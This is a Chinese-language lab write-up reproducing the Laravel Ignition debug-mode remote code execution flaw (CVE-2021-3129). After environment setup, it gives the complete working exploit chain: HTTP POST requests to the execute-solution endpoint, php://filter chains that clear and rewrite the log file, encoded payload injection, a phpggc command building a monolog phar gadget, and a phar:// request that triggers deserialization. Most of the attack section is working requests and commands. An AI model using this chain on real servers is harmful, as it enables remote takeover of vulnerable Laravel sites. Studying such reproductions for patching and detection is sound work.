laravel框架debug模式下的rce复现

Laravel框架RCE复现

环境安装

准备工作

宝塔面板的安装就不说了
laravel框架下载
下载好composer，网上的地址不能用了，可以下载个composer.phar
然后改名字
php版本注意7.2.5以上
宝塔的disable_function可以先关了，也可以只删除putenv
安装fileinfo扩展

框架安装

/www/server/php/72/bin/php composer.phar install

1611299493556

访问页面

1611299525394

创建key之后可以正常访问页面

创建不成的话，这里放个

base64:R2QMsCepWobuH1oWPBEuL/KMktILa3/k3Vt0+OBvmZ4=

1611299638002

漏洞复现

poc数据包

POST /index.php/_ignition/execute-solution HTTP/1.1
Host: 192.168.4.19:39016
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate
Origin: http://192.168.4.19:39016
Referer: http://192.168.4.19:39016/index.php
Accept-Language: zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7
Connection: close
Content-Length: 136

{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName": "username","viewFile":"aaa"}}

可以从debug处看到如下

1611300140472

详情分析见： Laravel Debug mode RCE（CVE-2021-3129）分析复现

请空log文件

{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName": "username","viewFile":"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/www/wwwroot/www.laravel.com/storage/logs/laravel.log"}}

返回包200即清空

添加前缀AA

AA

测试payload

=55=00=45=00=46=00=5A=00=54=00=45=00=39=00=42=00=52=00=41=00=3D=00=3D=00

{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName": "username","viewFile":"=55=00=45=00=46=00=5A=00=54=00=45=00=39=00=42=00=52=00=41=00=3D=00=3D=00"}}

清除，过滤掉多余字符

{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName": "username","viewFile":"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/www/wwwroot/www.laravel.com/storage/logs/laravel.log"}}

PAYLOAD成功写入

1611304422918

输出payload

1	php -d'phar.readonly=0' ./phpggc monolog/rce1 call_user_func phpinfo --phar phar -o php://output \| base64 -w0

将base64字符编码

>>> import base64
>>> s = 'PD9waHAgX19IQUxUX0NPTV ... gAAAEdCTUI='
>>> ''.join(["=" + hex(ord(i))[2:] + "=00" for i in s]).upper()
'=50=00=44=00=39= ... 00=55=00=49=00=3D=00'
>>>

清空干扰字符

{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName": "username","viewFile":"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/www/wwwroot/www.laravel.com/storage/logs/laravel.log"}}

触发反序列化

1	{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName": "username","viewFile":"phar:///www/wwwroot/www.laravel.com/storage/logs/laravel.log/1.txt"}}